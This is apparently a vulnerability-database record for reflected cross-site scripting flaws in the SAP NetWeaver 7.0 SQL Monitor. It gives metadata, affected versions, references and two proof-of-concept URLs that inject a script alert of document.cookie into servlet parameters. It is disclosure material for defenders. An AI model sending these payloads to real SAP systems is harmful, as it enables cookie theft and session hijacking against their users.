Details of VAR-E-201011-0049

ID

VAR-E-201011-0049

EDB ID

35001

TITLE

SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35001

DESCRIPTION

SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities.. remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 35001

AFFECTED PRODUCTS

vendor:	sap	model:	netweaver	scope:	eq	version:	7.0	Trust: 1.3
vendor:	sap	model:	netweaver	scope:	eq	version:	7.02	Trust: 0.3
vendor:	sap	model:	netweaver	scope:	eq	version:	7.01	Trust: 0.3

sources: BID: 44904 // EXPLOIT-DB: 35001

EXPLOIT

source: https://www.securityfocus.com/bid/44904/info

The SQL Monitor of SAP NetWeaver is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com:50100/OpenSQLMonitors/servlet/ConnectionMonitorServlet?view=stmtpool&node=12924950&ds=SAPSR3DB&connid
=com.sap.sql.jdbc.direct.DirectPooledConnection@1ed00a7<script>alert(document.cookie)</script>

http://www.example.com:50100/OpenSQLMonitors/servlet/CatalogBufferMonitorServlet?action=btnSHOW_COLUMNS&reqNode=12924950&reqBufferId=
SAPSERVER:dm0:SAPSR3DB&reqTableColumns=BC_RPROF_PROFILE<script>alert(document.cookie)</script>

Trust: 1.0

sources: EXPLOIT-DB: 35001

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35001

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35001

TYPE

SQL Monitor Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 35001

CREDITS

a.polyakov

Trust: 0.6

sources: EXPLOIT-DB: 35001

EXTERNAL IDS

db:	BID	id:	44904	Trust: 1.9
db:	EXPLOIT-DB	id:	35001	Trust: 1.6
db:	EDBNET	id:	56251	Trust: 0.6

sources: BID: 44904 // EXPLOIT-DB: 35001 // EDBNET: 56251

REFERENCES

url:	https://www.securityfocus.com/bid/44904/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/35001/	Trust: 0.6
url:	http://dsecrg.com/pages/vul/show.php?id=156	Trust: 0.3
url:	https://service.sap.com/sap/support/notes/1391770	Trust: 0.3
url:	http://www.sap.com/	Trust: 0.3

sources: BID: 44904 // EXPLOIT-DB: 35001 // EDBNET: 56251

SOURCES

db:	BID	id:	44904
db:	EXPLOIT-DB	id:	35001
db:	EDBNET	id:	56251

LAST UPDATE DATE

2022-07-27T09:52:31.109000+00:00

SOURCES UPDATE DATE

db:

BID

id:

44904

date:

2010-11-17T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	44904	date:	2010-11-17T00:00:00
db:	EXPLOIT-DB	id:	35001	date:	2010-11-17T00:00:00
db:	EDBNET	id:	56251	date:	2010-11-17T00:00:00